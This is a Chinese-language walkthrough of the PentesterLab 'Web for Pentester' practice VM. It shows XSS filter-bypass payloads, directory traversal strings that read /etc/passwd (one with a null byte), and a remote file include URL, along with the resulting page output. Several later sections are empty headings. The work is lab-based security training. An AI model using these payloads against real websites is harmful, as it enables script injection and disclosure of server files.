Web For Pentester
Reference:
- https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/
- https://pentesterlab.com/exercises/web_for_pentester/course
- https://f4l13n5n0w.github.io/blog/2015/05/22/pentesterlab-web-for-pentester-sql-injection/
Write-up
xss
- Example 1: 全都沒過濾
- 原始的html:
http://10.0.2.141/xss/example1.php?name=hacker<html> Hello hacker <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 在name參數插入
<script>alert("XSS")</script>後的html:http://10.0.2.141/xss/example1.php?name=<script>alert("XSS")</script><html> Hello <script>alert("XSS")</script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 原始的html:
- Example 2: 只過濾全小寫的
<script>和</script>- 同Example 1作法,此時
<script>和</script>被過濾掉了,而被當成string顯示:Hello alert("XSS") <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 隨便更改
<script>和</script>的大小寫,例如<Script>alert("XSS")</scripT>:Hello <Script>alert("XSS")</scripT> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 同Example 1作法,此時
- Example 3: 只過濾全部大小的
<script>和</script>- 當輸入任意大小寫的
<script>和</script>也同樣會被過濾掉,但若在<script>和</script>的前後都加上其它字串會發現前後加上的字串因此被串接在一起了:10.0.2.141/xss/example3.php?name=pen<scRIPt>alert("XSS")</SCript>test:Hello Penalert("XSS")Test <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 若前後串起來的字串剛好會變成是
<script>和</script>:10.0.2.141/xss/example3.php?name=<scr<scRIPt>ipt>alert("XSS")</scrip</SCript>t>Hello <script>alert("XSS")</script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 當輸入任意大小寫的
- Example 4: 若web直接將
script字樣設黑名單過濾掉,也就是出現script字樣就不執行,則要使用其它javascript語法來試試:- 沒有過濾左右括號,因此被嵌在標籤裡執行:
<a onmouseover=alert("XSS")Hello <a onmouseover=alert("XSS") <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>- 可用語法有:
onmouseover、onmouseout、onmousemove、onclick等 - 也可試其它tag如:
div、span、ul等 <imgtag:<img src='zzzz' onerror='alert("XSS")' />Hello <img src='zzzz' onerror='alert("XSS")'/> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 可用語法有:
- 沒有過濾左右括號,因此被嵌在標籤裡執行:
- Example 5:
- 此範例
<script>和</script>沒有被濾:http://10.0.2.141/xss/example5.php?name=<script>XSS</script>Hello <script>XSS</script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 但插入
<script>alert("XSS")</script>還是無法執行,這很有可能是過濾alert的問題,因此利用javascript的eval和String.fromCharCode來執行看看:http://10.0.2.141/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41,59))</script>,其中裡面的charcode就代表alert("XSS")字串:Hello <script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41,59))</script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 或替換為
prompt:<script>prompt("XSS")</script> - 或替換為
confirm:<script>confirm("XSS")</script>
- 此範例
- Example 6:
- 輸入任意字串結果都被包在雙引號裡面:
Hello <script> var $a= ""; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> - 可把第一個雙引號閉合:
- 最後再加上註解符號
//將";當成註解:";alert("XSS")//Hello <script> var $a= "";alert("XSS")//"; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 或是加入其它語法與最後的
";結合:";alert(1); var $dummy="Hello <script> var $a= "";alert(1); var $dummy=""; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 最後再加上註解符號
- 也可閉合
<script>:</script><script>alert("XSS")//or</script><script>alert("XSS")</script>Hello <script> var $a= "</script><script>alert("XSS")</script>"; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 輸入任意字串結果都被包在雙引號裡面:
- Example 7:
- 此範例將特殊符號做HTML-encoded,例如:
<script>alert("XSS")</script>Hello <script> var $a= '<script>alert("XSS")</script>'; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html> - 但卻忽略了單引號
',所以可利用單引號來閉合:';alert(1)//Hello <script> var $a= '';alert(1)//'; </script> <footer> <p>© PentesterLab 2013</p> </footer> </div> <!-- /container --> </body> </html>
- 此範例將特殊符號做HTML-encoded,例如:
- Example 8:
- 此範例的輸入欄位插不了,有做HTML編碼,但URL使用了
PHP_SELF取得目前網址,而沒做任何過濾防護:/"><script>alert(1);</script><form action="/xss/example8.php/"><script>alert(1);</script>" method="POST">
- 此範例的輸入欄位插不了,有做HTML編碼,但URL使用了
- Example 9: DOM-based XSS,IE 11.0.25可work:
http://10.0.2.141/xss/example9.php/#<script>alert(1);</script>
SQL injections
- Example 1:
Directory traversal
- 初步測試是否有Directory traversal:
/images/photo.jpg/images/./photo.jpg: 同個目錄下,得到相同檔案/images/../photo.jpg: 移到上層,找不到檔案/images/../images/photo.jpg: 移到上層又回來,得到相同檔案/images/../IMAGES/photo.jpg: 根據系統的不同可能會有不同結果或是其它情況
- Example 1:
http://10.0.2.141/dirtrav/example1.php?file=hacker.png- 加在
file=後面 http://10.0.2.141/dirtrav/example1.php?file=../../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh ...
- 加在
- Example 2:
http://10.0.2.141/dirtrav/example2.php?file=/var/www/files/hacker.png- 加在原本路徑後面
http://10.0.2.141/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd
- Example 3:
http://10.0.2.141/dirtrav/example3.php?file=hacker- 在payload後面加上
%00 http://10.0.2.141/dirtrav/example3.php?file=../../../../../../../etc/passwd%00
- 在payload後面加上
File include
- Example 1:
http://10.0.2.141/fileincl/example1.php?page=intro.phphttp://10.0.2.141/fileincl/example1.php?page=https://pentesterlab.com/test_include.txt
- Example 2:
Code injection
- Example 1: